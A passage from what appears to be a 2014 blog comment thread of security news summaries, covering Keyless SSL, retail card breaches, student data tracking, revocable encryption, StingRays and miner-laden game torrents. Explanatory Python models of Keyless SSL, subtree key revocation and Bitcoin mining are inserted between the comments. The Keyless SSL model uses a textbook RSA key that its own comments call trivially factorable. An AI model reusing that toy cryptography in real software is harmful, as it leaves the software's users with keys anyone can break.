    In this blog post announcing the service, cofounder and CEO Matthew Prince explains that “the only way organisations that had the highest standards of SSL security could ever adopt the benefits of the cloud is if we never took possession of their SSL keys.”

    In the handshakes used to negotiate an SSL session, he writes, “the private key is only used once in each handshake. This allows us to split the TLS handshake geographically, with most of the handshake happening at CloudFlare’s edge while moving the private key operations to a remote key server”.

    With the key server under the customer’s control, the company says, they have “exclusive access to the private key”.

    Reply
  20. Tomi Engdahl says:

    CloudFlare’s Keyless SSL Server Reference Implementation
    https://github.com/cloudflare/keyless

    Reply
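The split Prince describes in the previous comment, and the role the reference implementation linked above plays, as an added example that is not CloudFlare's code or the github.com/cloudflare/keyless implementation: the edge runs the handshake and hashes the transcript, then asks a customer-controlled key server for the single private-key operation, and the client verifies with the public key alone. The toy RSA key, the transcript layout and the HMAC token authenticating the edge to the key server are assumptions of this model.

```python
"""Keyless SSL, modelled: the edge completes the handshake, the key server signs.

Added example, not CloudFlare's code or the github.com/cloudflare/keyless
implementation: it shows the split the article describes, with the private key
operation moved to a key server the customer controls and the edge holding only
the public key. Textbook RSA over two Mersenne primes stands in for the real
certificate key (a deliberate toy: trivially factorable, no padding), and the
edge/key-server authentication token is an assumption of this model. In real
TLS the one private-key operation is an RSA decrypt (RSA key exchange) or a
signature (ECDHE); this toy models the signature case.
"""
import hashlib
import hmac
import secrets

# Toy RSA key: n is about 648 bits, so a SHA-256 digest fits below the modulus.
P = (1 << 127) - 1
Q = (1 << 521) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # private exponent (Python 3.8+)


class KeyServer:
    """Runs on the customer's premises. Holds the private key; exposes only sign()."""

    def __init__(self, private_exponent, modulus, edge_secret):
        self._d = private_exponent
        self.n = modulus
        self._edge_secret = edge_secret   # shared with the authorised edge only
        self.audit_log = []               # every signing request is recorded

    def sign(self, digest, token):
        # Refuse anything that is not an authenticated request from the edge.
        expected = hmac.new(self._edge_secret, digest, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, token):
            self.audit_log.append(("rejected", digest.hex()))
            raise PermissionError("unauthenticated signing request")
        self.audit_log.append(("signed", digest.hex()))
        # The one private-key operation per handshake: sign the transcript hash.
        return pow(int.from_bytes(digest, "big"), self._d, self.n)


class Edge:
    """CloudFlare-side role: terminates TLS but never sees the private key."""

    def __init__(self, public_exponent, modulus, key_server, edge_secret):
        self.e = public_exponent
        self.n = modulus
        self._key_server = key_server
        self._edge_secret = edge_secret

    def server_handshake(self, client_random):
        server_random = secrets.token_bytes(32)
        # Everything up to the signature happens locally at the edge.
        transcript = client_random + server_random + b"ECDHE-params(toy)"
        digest = hashlib.sha256(transcript).digest()
        token = hmac.new(self._edge_secret, digest, hashlib.sha256).digest()
        signature = self._key_server.sign(digest, token)   # remote, once per handshake
        return server_random, signature


def verify(public_exponent, modulus, transcript, signature):
    """Client side: check the signature against the certificate's public key."""
    digest = int.from_bytes(hashlib.sha256(transcript).digest(), "big")
    return pow(signature, public_exponent, modulus) == digest


def unauthenticated_request_is_refused(key_server):
    """True if the key server rejects a signing request without a valid token."""
    try:
        key_server.sign(b"\x00" * 32, b"not-a-valid-token")
    except PermissionError:
        return True
    return False


def run_handshake():
    """Wire the roles together and return what an operator would want to inspect."""
    edge_secret = secrets.token_bytes(32)
    ks = KeyServer(D, N, edge_secret)
    edge = Edge(E, N, ks, edge_secret)
    client_random = secrets.token_bytes(32)
    server_random, sig = edge.server_handshake(client_random)
    transcript = client_random + server_random + b"ECDHE-params(toy)"
    return {
        "valid": verify(E, N, transcript, sig),
        # The edge object holds no attribute equal to the private exponent.
        "edge_has_private_key": any(v == D for v in vars(edge).values()),
        "audit": ks.audit_log,
        "key_server": ks,
    }


if __name__ == "__main__":
    r = run_handshake()
    print("signature valid:", r["valid"])
    print("edge holds private key:", r["edge_has_private_key"])
    print("key server audit log:", r["audit"])
```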
  21. Tomi Engdahl says:

    Home Depot admits 56 million card details were stolen
    Smashes Target’s record
    http://www.theinquirer.net/inquirer/special/2371244/home-depot-admits-56-million-card-details-were-stolen

    DO IT YOURSELF RETAILER Home Depot has completed an investigation of its recent server breach and reported that some 56 million unique payment card accounts were stolen.

    The firm said that there is no evidence that the hackers made off with any PIN numbers, but has offered its customers credit services. It predicted that its own financial damage will be $62m.

    Reply
  22. Tomi Engdahl says:

    A day in the life of a data mined kid
    http://www.marketplace.org/topics/education/learningcurve/day-life-data-mined-kid

    Education, like pretty much everything else in our lives these days, is driven by data.

    Our children’s data. A whole lot of it.

    Nearly everything they do at school can be — and often is — recorded and tracked, and parents don’t always know what information is being collected, where it’s going, or how it’s being used.

    The story begins at the bus stop.

    Your child swipes his ID card and climbs on the bus. The card may contain an RFID or radio frequency identification chip, which lets the school know when he gets on and off the bus. In some school districts, parents will get text alerts, letting them know their child arrived safely to school. The bus technology is presented as a way to keep children safer.

    “The data collection begins even before he steps into the school,” says Khaliah Barnes, director of the Student Privacy Project at the Electronic Privacy Information Center.

    And, says Barnes, in some schools it just keeps on going. RFID chips let schools track kids on school grounds. Administrators could know if a child leaves the building, or if he visits the school counselor.

    “The issue is that this reveals specifically sensitive information,” says Barnes.

    Location information is just one small part of a child’s data file.

    In the classroom, teachers gather data on routine things like attendance, tardiness, test scores and grades. The kinds of records that used to be kept on paper.

    The government isn’t the only one trying to figure out what’s working by investing in and gobbling up data about your kid.

    Sales of educational technology software for kids in kindergarten through high school reached nearly $8 billion last year, according to the Software and Information Industry Association.

    One of the biggest players in the field is Knewton. It analyzes student data that it collects by keeping track of nearly every click and keystroke your child makes during digital lessons.

    Knewton claims to gather millions of data points on millions of children each day. Ferreira calls education “the world’s most data-mineable industry by far.”

    “We have five orders of magnitude more data about you than Google has,” he says in the video. “We literally have more data about our students than any company has about anybody else about anything, and it’s not even close.”

    Five orders of magnitude more data than Google is a whole lot of data.

    Teachers are increasingly relying on behavior monitoring software not only to keep kids on track, but to track them, too.

    “We live in a 24/7 data mining universe today,” says Jim Steyer, CEO of Common Sense Media. “And I think most of us parents and teachers and kids don’t realize how much of our data is out there and used by other people.”

    At lunch, a child may use her ID to pay for her mini-cheeseburgers.

    Cafeteria software might also track exactly what she eats.

    In gym class, some kids strap on heart-rate monitors, which record how hard they are working out.
    Other kids are asked to wear Fitbit-style wrist bands that record their activities at school, on the playground and at home — where the data grab continues.

    Many schools have installed tracking technology on school-owned computers as a security measure. The technology allows schools to see where a kid is logging in from, via an IP address.

    Reply
  23. Tomi Engdahl says:

    “People are afraid, but do not know of what” – information security has become everyone’s concern

    Data breaches and cloud threats are now in everyone’s consciousness. But how can ordinary people get security set up without having to manually adjust any complicated settings?

    Security. The magical compound word, which a few years ago meant the cryptic tinkering of server-room men or propeller-heads.

    Not any more. Now security is everywhere. Sometimes it is visible, sometimes it is not. Its lack, however, is reflected everywhere, as the recent media coverage has revealed.

    Darmon says that a few years ago his friends did not understand what he does for a living. But the world has changed rapidly. Darmon tells how he realized that security had entered ordinary people’s world.

    the 2011 PlayStation breach that put the PSN network out of action for a 24-day period.

    After this, Darmon has had to answer his friends’ questions about whether their machine may have been hijacked. The answer is usually along the lines of “yes, but the target is not you but your machine, which spammers, for example, use”.

    If possible, the recent leak of American celebrities’ nude photos from Apple’s cloud has shaken ordinary people’s sense of basic security even more. Some have already had time to call the case the 9/11 of security.

    - It is a company’s responsibility to ensure its customers’ information security. Many do not do it properly, Darmon says, criticising companies without naming them, however.

    - People are afraid, but do not know of what.

    It is not merely about intrusions and data theft. Holiday pictures posted to the cloud can reveal that an apartment is empty.

    In data security entering the public consciousness, Darmon sees an opportunity for change.

    - After all, we are all consumers, the business world included. Therefore, it is only natural that development goes from there to consumers.

    Check Point’s solution is based on tunneling the mobile devices’ communication through online gateway servers that run a copy of the security policies in use on the company network. Only then is the traffic directed to the Internet.

    - We do not want people to adjust the device settings, or to have to make the adjustments themselves.

    As the traffic filtering is done in the cloud, the mobile device only runs lightweight client software. In addition, the mobile device’s content may be split into separate volumes.

    Current consumer clouds often put availability/usability above security. Darmon believes that this is changing.

    - Security is like a seat belt in cars. At first it was opposed, now it is used by all. Nowadays, people want airbags in their cars.

    It is not only criminals who violate privacy on the network. The authorities also break into systems and eavesdrop. Security companies’ attitudes to this vary.

    Source: http://www.itviikko.fi/tietoturva/2014/09/18/ihmiset-pelkaavat-mutteivat-tieda-mita–tietoturvasta-tuli-jokaisen-huoli/201412937/7?rss=8

    Reply
  24. Tomi Engdahl says:

    ‘Naked pictures’ of Kim Kardashian and others ‘leaked’
    21 September 2014 Last updated at 11:06
    http://www.bbc.co.uk/newsbeat/29300374

    More pictures and videos which seem to show celebrities naked have been posted online.

    It’s thought to be the second massive hacking-related leak in less than a month, but it’s not clear yet where the pictures came from.

    They were briefly posted on 4chan and Reddit before being removed, according to reports.

    Apple called the first hack a “targeted attack” but denied its iCloud storage system had been compromised.
    It suggested the celebrities had their accounts hacked by using easy-to-guess passwords or giving up personal data to cyber criminals posing as Apple.

    Reply
  25. Tomi Engdahl says:

    Researchers Propose a Revocable Identity-Based Encryption Scheme
    http://it.slashdot.org/story/14/09/22/0243225/researchers-propose-a-revocable-identity-based-encryption-scheme

    Identity-based public key encryption works on the idea of using something well-known (like an e-mail address) as the public key and having a private key generator do some wibbly-wobbly timey-wimey stuff to generate a secure private key out of it.

    The paper notes that security has been a big hassle in IBE-type encryption, as has revocation of keys. The authors claim, however, that they have accomplished both.

    Anyways, this is not the only cool new crypto concept in town, but it is certainly one of the most intriguing as it would be a very simple platform for building mostly-transparent encryption into typical consumer apps.

    An Efficient and Provable Secure Revocable Identity-Based Encryption Scheme
    http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0106925

    Revocation functionality is necessary and crucial to identity-based cryptosystems. Revocable identity-based encryption (RIBE) has attracted a lot of attention in recent years, many RIBE schemes have been proposed in the literature but shown to be either insecure or inefficient. In this paper, we propose a new scalable RIBE scheme with decryption key exposure resilience by combining Lewko and Waters’ identity-based encryption scheme and complete subtree method, and prove our RIBE scheme to be semantically secure using dual system encryption methodology.

    Reply
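The complete subtree method named in the abstract, as an added example that is not the paper's code: it computes the KUNodes cover for a revoked set and checks which users can still derive a decryption key from the published key update. The tree size and the revoked identities are constructed.

```python
"""Complete subtree (CS) revocation cover, as used by tree-based RIBE.

Added example, not code from the paper: in RIBE schemes built on the complete
subtree method, users are the leaves of a binary tree, each user's secret key
has a component for every node on its root-to-leaf path, and the key update
for a time period is published only for the nodes returned by KUNodes(tree,
revoked set). A user derives the period's decryption key only if one of its
path nodes was covered. Tree size and revoked identities are constructed here.
"""


class CompleteSubtree:
    """Binary tree over a power-of-two number of leaves, heap-numbered from root = 1."""

    def __init__(self, capacity):
        # Round the capacity up to 2^k leaves; leaf i for user i is n_leaves + i.
        self.n_leaves = 1 << max(0, capacity - 1).bit_length()
        self.root = 1

    def leaf(self, user):
        if not 0 <= user < self.n_leaves:
            raise ValueError(f"user {user} outside tree capacity {self.n_leaves}")
        return self.n_leaves + user

    def path(self, node):
        """Nodes from `node` up to and including the root."""
        nodes = []
        while node >= 1:
            nodes.append(node)
            node //= 2
        return nodes

    def children(self, node):
        # Leaves (node >= n_leaves) have no children.
        return (2 * node, 2 * node + 1) if node < self.n_leaves else ()

    def ku_nodes(self, revoked_users):
        """KUNodes: the set of subtree roots covering every non-revoked leaf.

        X = all nodes on the paths of revoked leaves; Y = children of nodes in X
        that are not themselves in X. With nobody revoked, the root covers all.
        The size of Y is O(r log(N/r)) for r revoked users among N leaves.
        """
        if not revoked_users:
            return {self.root}
        x = set()
        for user in revoked_users:
            x.update(self.path(self.leaf(user)))
        return {child for node in x for child in self.children(node) if child not in x}

    def can_derive_key(self, user, key_update_nodes):
        """A user decrypts in this period iff some node on its path got a key update."""
        return any(node in key_update_nodes for node in self.path(self.leaf(user)))

    def covered_users(self, key_update_nodes):
        return [u for u in range(self.n_leaves) if self.can_derive_key(u, key_update_nodes)]


if __name__ == "__main__":
    tree = CompleteSubtree(8)
    for revoked in (set(), {5}, {1, 5}, set(range(8))):
        ku = tree.ku_nodes(revoked)
        print(f"revoked={sorted(revoked)} -> key update for nodes {sorted(ku)}, "
              f"covers users {tree.covered_users(ku)}")
```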
  26. Tomi Engdahl says:

    Wired Profiles John Brooks, the Programmer Behind Ricochet
    http://it.slashdot.org/story/14/09/21/1635246/wired-profiles-john-brooks-the-programmer-behind-ricochet

    Four years ago he began work on a program for encrypted instant messaging that uses Tor hidden services for the protected transmission of communications. The program, which he dubbed Ricochet, began as a hobby. But by the time he finished, he had a full-fledged desktop client that was easy to use, offered anonymity and encryption, and even resolved the issue of metadata

    so few people even knew about it.

    Then the Snowden leaks happened and metadata made headlines. Brooks realized he already had a solution that resolved a problem everyone else was suddenly scrambling to fix.

    Middle-School Dropout Codes Clever Chat Program That Foils NSA Spying
    http://www.wired.com/2014/09/new-encrypted-chat-program-thwarts-nsa-eliminating-metadata/

    With metadata suddenly in the spotlight, Brooks decided earlier this year to dust off his Ricochet program and tweak it to make it more elegant—he knew he’d still have a problem, however, getting anyone to adopt it. He wasn’t a known name in the security world and there was no reason anyone should trust him or his program.

    Enter Invisible.im, a group formed by Australian security journalist Patrick Gray. Last July, Gray announced that he was working with HD Moore, developer of the Metasploit Framework tool used by security researchers to pen-test systems, and with another respected security professional who goes by his hacker handle The Grugq, to craft a secure, open-source encrypted chat program cobbled together from parts of existing anonymity and messaging systems—such as Prosody, Pidgin and Tor. They wanted a system that was highly secure, user friendly and metadata-free. Gray says his primary motivation was to protect the anonymity of sources who contact journalists.

    “At the moment, when sources contact a journalist, they’re going to leave a metadata trail, whether it’s a phone call record or instant message or email record [regardless of whether or not the content of their communication is encrypted],” he says. “And that data is currently accessible to authorities without a warrant.”

    When Brooks wrote to say he’d already designed a chat program that eliminated metadata, Gray and his group took a look at the code and quickly dropped their plan to develop their own tool, in favor of working with Brooks to develop his.

    Reply
  27. Tomi Engdahl says:

    Mushy spam law’s IDEAL for toothless watchdog: Spamhaus slams CAN-SPAM
    One in 10 non-compliance? It’s worse than that, even in the US
    http://www.theregister.co.uk/2014/09/22/spam_compliance_survey_spamhaus_response/

    Antispam organisation Spamhaus has reacted phlegmatically to a recent survey that one in 10 of the world’s largest online retailers are still violating the CAN-SPAM Act, a full 10 years after the US anti-spam legislation went into effect.

    Richard Cox, CIO of The Spamhaus Project, suggested the Online Trust Alliance (OTA)’s figures of one in 10 e-tailers failing to abide by CAN-SPAM because of failures in honouring unsubscribe requests is probably optimistic.

    The lax and/or inadequate enforcement regime of North American anti-spam regimes is a root cause of the problem, according to Cox.

    “If anything the issue in the USA as things stand is the unenforceability of the regime, [rather] than just the inadequacy of its enforcement. There have been only a handful of actions in the entire 10 years this law has been in force: and even those actions were limited to the most egregious cases, and mostly just ‘add-ons’ to other enforcement actions.”

    Things are even worse in the UK, he added.

    “The goal of the larger corporate backers of CAN-SPAM seems to have been to reduce or eliminate any right of private legal action by spam victims against those who spammed them. Only ISPs are allowed to take matters to the courts – and only a handful ever have. It’s not worth the money, as extracting actual damages from spammers is usually a fruitless quest,”

    Reply
  28. Tomi Engdahl says:

    The Raid-Proof Hosting Technology Behind ‘The Pirate Bay’
    http://yro.slashdot.org/story/14/09/22/0213229/the-raid-proof-hosting-technology-behind-the-pirate-bay

    Ernesto reports at TorrentFreak that despite its massive presence the Pirate Bay doesn’t have a giant server park but operates from the cloud, on virtual machines that can be quickly moved if needed. The site uses 21 “virtual machines” (VMs) hosted at different providers, up four machines from two years ago, in part due to the steady increase in traffic. Eight of the VM’s are used for serving the web pages, searches take up another six machines, and the site’s database currently runs on two VMs. The remaining five virtual machines are used for load balancing, statistics, the proxy site on port 80, torrent storage and for the controller. In total the VMs use 182 GB of RAM and 94 CPU cores. The total storage capacity is 620 GB. One interesting aspect of The Pirate Bay is that all virtual machines are hosted with commercial cloud hosting providers, who have no clue that The Pirate Bay is among their customers.

    The Pirate Bay Runs on 21 “Raid-Proof” Virtual Machines
    By Ernesto
    on September 21, 2014
    http://torrentfreak.com/the-pirate-bay-runs-on-21-raid-proof-virtual-machines-140921/

    With several million daily visitors The Pirate Bay is one of the 100 most-visited websites on the Internet. Despite its massive presence the website does not have a giant server park. Instead, it operates from the cloud, on 21 virtual machines that can be quickly moved if needed.

    Reply
  29. Tomi Engdahl says:

    ISIS Uses ‘GTA 5′ In New Teen Recruitment Video
    http://www.forbes.com/sites/insertcoin/2014/09/20/isis-uses-gta-5-in-new-teen-recruitment-video/

    Terrorist group ISIS has combined brutality with social media acumen to become one of the most feared and reviled organizations on earth in recent months

    broadcasting unspeakable acts of violence.

    No, playing Grand Theft Auto or other games like it is not likely a precursor to wanting to “upgrade” to real world violence. With GTA 5 specifically, the game has sold over $2B worth of copies since it was released

    Obviously there are about a hundred factors listed over “loves GTA 5″ as to why someone would choose to join ISIS, but some believe that video games have the ability to desensitize young people to violence.

    No matter how many violent games you play, I think it’s a very, very low percentage of players who actually become desensitized to real life violence in the process.

    Still, I’m sure Rockstar is going to be uncomfortable with their game being used as a terrorist recruiting tool.

    Reply
  30. Tomi Engdahl says:

    DuckDuckNo: The privacy-focused search engine is blocked in China
    http://thenextweb.com/asia/2014/09/22/duckduckno/

    DuckDuckGo, the privacy-focused search engine that lives in Google’s enormous shadow, has joined its big rival and plenty of other western tech firms in being blocked in China.

    The past 18 months have seen much progress for DuckDuckGo. Its user base grew significantly amid Edward Snowden’s NSA revelations last year, ending 2013 with over 1 billion searches. An impressive number though that is, Google processes over 100 billion search queries each month — that said, DuckDuckGo has established itself as an option for those that appreciate its approach to privacy.

    That point was illustrated when DuckDuckGo became the default private search engine for Apple’s Safari browser earlier this year.

    Reply
  31. Tomi Engdahl says:

    80 PER CENT of app devs SUCK at securing your data, study finds
    Ignore that, look at my shiny-shiny
    http://www.theregister.co.uk/2014/09/23/app_devs_suck_at_security_says_trainer/

    Developers are experts in spinning wonderfully-shiny, horribly-insecure apps, according to research from Aspect Security.

    Social media meeting buttons and go-live dates rate far higher with app developers than the need to ensure the security of private data.

    Worse, devs couldn’t secure apps if they wanted to, according to the company’s year-long study.

    The majority of some 1,400 random devs from 700 businesses flunked a set of multiple-choice application security tests covering 53 topics, obtaining a 60 per cent mark and a “D” rating.

    The most terrible carnage was found in the protection of sensitive data, which 80 per cent of developers flunked.

    Security architecture and models baffled three quarters of responding devs who chose the wrong answer in what may answer the question of why architecture-level vulnerabilities existed in apps.

    “You would think that after 15 years of securing sessions in web applications, this area would be a simple one for developers,” the report authors wrote.

    “Securing sessions improperly leads to session hijacking and other attacks. Developers must understand that session ids are just as sensitive as passwords and must be protected accordingly.”

    Reply
  32. Tomi Engdahl says:

    Before Using StingRays, Police Must Sign NDA With FBI
    http://yro.slashdot.org/story/14/09/22/1851246/before-using-stingrays-police-must-sign-nda-with-fbi

    Advanced cell phone tracking devices known as StingRays allow police nationwide to home in on suspects and to log individuals present at a given location. But before acquiring a StingRay, state and local police must sign a nondisclosure agreement with the FBI

    Before deploying StingRays, police departments must sign nondisclosure agreement with FBI
    https://www.beaconreader.com/muckrock/before-deploying-stingrays-police-departments-must-sign-nondisclosure-agreement-with-fbi

    The document released by the Tacoma Police Department is heavily redacted — four of its six pages are completely blacked out — but two unredacted paragraphs confirm the FBI’s intimate involvement with StingRay deployment across the country.

    The StingRay family of trackers are manufactured by the Harris Corporation, a company with $5 billion in annual revenue and headquarters in Melbourne, Florida. As “cell site simulators,” the trackers trick mobile phones into connecting to a StingRay as if it were a cell tower.

    Reply
  33. Tomi Engdahl says:

    Apple passcode-protects iOS 8 devices, but cops can still inhale your iCloud
    Don’t congratulate yourselves too soon, Apple – securobod
    http://www.theregister.co.uk/2014/09/23/icloud_hole_in_ios8_passcode_protection/

    Improved security features in iOS 8 prevent Apple from unlocking phones – even for law enforcement. But search warrant-holding cops can still get almost everything through iCloud backups, according to ElcomSoft.

    Katalov said that the iOS 8 security enhancements will render one of the computer forensics products the Russian firm sells to law enforcement ineffective.

    “That will affect only one of our products – ElcomSoft iOS Forensic Toolkit, designed for physical device acquisition (and anyway, for iPhone 4S+, it supported jailbroken devices only without jailbreak, physical acquisition was available only to Apple itself),” Katalov told El Reg

    However, a browse through Apple’s document on government information requests reveals links to Apple’s guidelines for law enforcement requests that paint a different picture (see links to guidelines for the US, EMEA and APAC – warning: all PDFs).

    The “Information Available From Apple” section reveals all sorts of information is potentially accessible from the manufacturer

    The T&Cs leave plenty of wiggle room for Apple to hand over data for reasons ranging from “comply[ing] with legal process or request” to “detect, prevent or otherwise address security, fraud or technical issues”, among other reasons.

    Reply
  34. Tomi Engdahl says:

    Game pirates ‘donate’ compute power to Bitcoin miners
    Repack cracks foists Bitcoin miner hack
    http://www.theregister.co.uk/2014/09/23/game_pirates_donate_compute_power_to_bitcoin_miners/

    Hundreds of video game pirates have generously, if inadvertently, donated their compute resources to virus writers by downloading Bitcoin miner-infected torrent listings.

    Dozens of game torrent files identified by Microsoft threat researchers as malicious have been downloaded thousands of times and were continuing to be seeded (or uploaded) by attackers, victims or seedbox servers.

    The dropper is detected as TrojanDropper:Win32/Maener.

    Infected pirates could cautiously search for the Bitcoin miner running under Windows processes named connost.exe, minerd.exe, svchost.exe or winhost.exe.

    Downloading torrents or any third-party software from untrusted or insecure sources placed users at risk

    Reply
  35. Tomi Engdahl says:

    Coconut or peach – strategic choices

    Support: IT management should be able to support all IT equipment and services used by the company’s employees. Typically, the issue has been resolved with standardized workstation models and installations. This usually keeps about 80 percent of users quite happy. There is, however, a continuous debate about how flexible the standard can be.

    Security: If anything at all can be installed on the network (or even on an individual workstation), it will not take long before the company has a virus or malware. Whoever is to blame, IT is still responsible for the damage, and ultimately a too-loose security policy gets the blame. The losses may, moreover, be quite extensive.

    The easiest way is to prevent users from making any changes to client configurations and to shut unknown devices out of the internal network. All traffic out of the house is passed through strict firewalls and spam filters. This model, in which the IT promised land is hermetically isolated behind firewalls, could be called the Coconut. For the last 20 years, IT organizations have been built with the coconut in mind.

    In recent years, however, forces of change have arisen that threaten the coconut’s position as the Holy Grail of IT architecture. Many of the company’s business processes now run in cloud services. Internal matters are discussed in public services. The BYOD phenomenon is pushing companies in one form or another. It is getting increasingly difficult to restrict users’ lives to the inside of a nut. At the same time, it is becoming increasingly difficult for IT management to take responsibility for the company’s entire computing environment, when large parts of it are starting to be outside its control. What to do?

    Future IT can instead be modeled on the peach. A peach has a hard stone, but it is inside the fruit (the so-called added value). Even if the outer surface gets dented, the stone inside should not suffer. The peach’s hard, strongly protected core is formed by the company’s core data and processes, those that are indispensable to its survival. There is still a need for firewalls and strong authentication. All other systems are useful but not essential. They are the flesh of the peach, the food, with which people’s work and communication can be enhanced and where people can enjoy their work. If an error or a security breach occurs in a system outside the core, it can of course cause problems, but it does not jeopardize the company’s business.

    Source: http://www.tivi.fi/cio/blogit/ict_standard_forum/kookospahkina+vai+persikka+ndash+strategisia+valintoja/a1013288

    Reply
  36. Tomi Engdahl says:

    F-Secure’s free security also for older Samsung devices

    Samsung device users in Finland, Sweden, Norway and Denmark get free access to the F-Secure Safe security product, which promises protection from malware, identity theft, fraudulent websites and applications, as well as network attacks.

    “After installation, Safe is automatically free of charge for two years, after which the owner can activate it for free for one more year,” F-Secure’s Consumer Sales and Marketing Director Perttu Tynkkynen explains.

    The normal annual license price is 49.90 euros.

    The benefit is not only tied to the purchase of new devices; it is also offered to existing Samsung users. It is available through Samsung uPick:
    https://play.google.com/store/apps/details?id=com.samsung.samsungupick&hl=fi

    Source: http://www.tivi.fi/kaikki_uutiset/fsecuren+ilmaista+tietoturvaa+myos+vanhemmille+samsungeille/a1013808

  37. Tomi Engdahl says:

    96 million credit card details stolen – what should you learn from these cases?

    The Target company (a pretty appropriate name) suffered a data breach. Reissuing more than 20 million payment cards alone caused more than $200 million in costs.

    How much have the criminals gained from this? According to an estimate on Krebs's site, the criminals sold 1-3 million card records, which must also have been misused, at an average price of $26.85 per card. In this way alone the criminals have netted about $53.7 million.

    In addition, economic damage is caused by purchases made with these stolen cards. On top of that come other indirect damages that have followed, for example campaigns using the stolen e-mail contact information. Stolen e-mail contacts have traditionally been used to attempt, for example, phishing for passwords to banking and other services of interest to criminals.

    Krebs reported on 9/14/2014 that a significant amount of card data had gone on sale on criminal trading sites as a result of a break-in at The Home Depot chain of stores. According to a press release, the company has spent $62 million on investigating and repairing the crime, a sum reduced by $27 million in insurance payouts received.

    What should we learn from these?

    1. The economic damage may be substantial
    2. Criminal organizations are one step ahead
    3. Educate your staff!
    4. Prepare, and develop your administrative processes
    5. Determine whether you have enough technical controls available

    The better and more thoroughly you are able to monitor what is happening on your network, log and analyze that data, and respond to the findings, the smaller the damage will be.

    If Stuxnet was in its time the wake-up call for cyber risks in closed networks and industrial automation, these two massive data breaches should now open the last eyes in all organizations!

    If you or your organization handles money electronically, it is guaranteed bait for criminals, like honey.

    Source: http://www.tivi.fi/blogit/turvasatama/96+miljoonan+luottokortin+tiedot+varastettu+ndash+mita+naista+tapauksista+kannattaa+oppia/a1013568

  38. Tomi Engdahl says:

    Apple’s TouchID Fingerprint Scanner: Still Hackable
    http://apple.slashdot.org/story/14/09/23/218212/apples-touchid-fingerprint-scanner-still-hackable

    A year ago, security researcher Marc Rogers demonstrated how to spoof the TouchID sensor in the iPhone 5S using some Elmer’s glue and glycerol — oh, and a high resolution camera and a laser printer.

    He has again hacked the iPhone 6’s TouchID sensor using the same method.

  39. Tomi Engdahl says:

    Obama wants a binding UN Security Council resolution requiring all UN member countries to enact laws punishing those who go abroad to join terrorist groups. The United States also wants the assistance and financing of such people to be made punishable.

    According to The New York Times, this is the first time that the recruitment of terrorists has been defined and made punishable internationally. It is pretty much impossible to prove that someone is preparing to go abroad to join a terrorist organization, or that someone has committed crimes abroad.

    The problem is, of course, proof: nobody is going to report to the police that they are going abroad to join ISIS, or that, having returned from Syria, they committed crimes there.

    Source: http://www.hs.fi/ulkomaat/Obama+haluaa+uusia+terrorismilakeja+kaikkiin+maihin/a1411521634398?ref=hs-art-new-1

  40. Tomi Engdahl says:

    Apple iOS7 full of holes

    Apple released its new iOS operating system for users to download last week.
    The iOS8 version brings a host of new features, but also fixes and patches. According to the Swedish security house Sophos, some of the vulnerabilities in iOS7 were critical. The new platform fixes more than 40 of the old iOS vulnerabilities. Sophos has made a video on the most serious of them:
    10 security holes that cybercrooks dream about – 60 Sec Security [VIDEO]
    http://nakedsecurity.sophos.com/2014/09/20/10-security-holes-that-cybercrooks-dream-about-60-sec-security-video/

    Sophos also says Android has security problems. According to Sophos, Android has a big security risk called the Android Browser. It allows the user’s personal information to be read. The company recommends using safer browsers such as Chrome, Dolphin, Opera or Firefox.

    Source: http://etn.fi/index.php?option=com_content&view=article&id=1812:applen-ios8-taynna-reikia&catid=13&Itemid=101

  41. Tomi Engdahl says:

    Bitcoin-mining company Butterfly Labs shut down by FTC
    http://www.cnet.com/news/bitcoin-mining-company-butterfly-labs-shut-down-by-ftc/

    Company marketed specialized computers designed to produce the cryptocurrency but delivered useless machines, according to an FTC complaint.

    A bitcoin-related company that allegedly engaged in deceptive marketing of specialized computers designed to produce the cryptocurrency has been shut down at the request of the US Federal Trade Commission.

    “We often see that when a new and little-understood opportunity like bitcoin presents itself, scammers will find ways to capitalize on the public’s excitement and interest,”

    Bitcoin, which is unregulated and allows for anonymous, untraceable transactions, can be obtained by purchasing it on an exchange or accepting it as payment for goods or services. The peer-to-peer currency can also be generated, or “mined,” by solving complex mathematical equations, a process that requires greater computational effort as the pool of possible solutions shrinks. The amount of bitcoins possible is capped at 21 million; there are currently 13.3 million bitcoins in existence.

    To perform the arduous mining process, the company marketed what it called a cutting-edge computer for as much as $29,899, the FTC alleged. A

    The virtual currency sprang up in 2009 but its acceptance has grown dramatically in the past couple of months. Cryptocurrency ATMs have begun to pop up, some casinos have said they would accept digital currency payments, and even eBay has begun allowing for limited sales of Bitcoins on its US and UK sites.

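The "mining" the article describes is a brute-force search for a block header whose double-SHA-256 hash falls below a difficulty target. The following is an added illustration, not Bitcoin Core's or Butterfly Labs' code: the header layout is a constructed toy (previous hash, merkle root, 32-bit nonce) rather than the real 80-byte header, and the sample inputs are made up. It shows why the effort grows exponentially with difficulty while verifying a solution stays a single hash.

```python
import hashlib
import struct

# Added illustration of proof-of-work mining; not Bitcoin Core's or
# Butterfly Labs' code. The header below is a constructed toy that keeps
# only the parts that matter for the search.

SAMPLE_PREV_HASH = bytes(32)                                            # constructed: zero parent hash
SAMPLE_MERKLE_ROOT = hashlib.sha256(b"constructed sample transactions").digest()


def sha256d(data: bytes) -> bytes:
    """Bitcoin's hash: SHA-256 applied twice."""
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()


def target_for_bits(difficulty_bits: int) -> int:
    """Largest acceptable hash value: the top `difficulty_bits` bits must be zero."""
    return (1 << (256 - difficulty_bits)) - 1


def header_bytes(prev_hash: bytes, merkle_root: bytes, nonce: int) -> bytes:
    # Toy header: previous block hash, merkle root, 32-bit little-endian nonce.
    return prev_hash + merkle_root + struct.pack("<I", nonce)


def meets_target(block_hash: bytes, difficulty_bits: int) -> bool:
    """Read the hash as a big-endian integer and compare it with the target."""
    return int.from_bytes(block_hash, "big") <= target_for_bits(difficulty_bits)


def mine(prev_hash: bytes, merkle_root: bytes, difficulty_bits: int, max_nonce: int = 1 << 32):
    """Brute-force the nonce.

    Each hash is an independent trial with success probability 2**-difficulty_bits,
    so the expected work is about 2**difficulty_bits hashes: every extra bit of
    difficulty doubles the effort, which is why dedicated mining hardware exists.
    Returns (nonce, hash) or None if the nonce space is exhausted.
    """
    for nonce in range(max_nonce):
        block_hash = sha256d(header_bytes(prev_hash, merkle_root, nonce))
        if meets_target(block_hash, difficulty_bits):
            return nonce, block_hash
    return None


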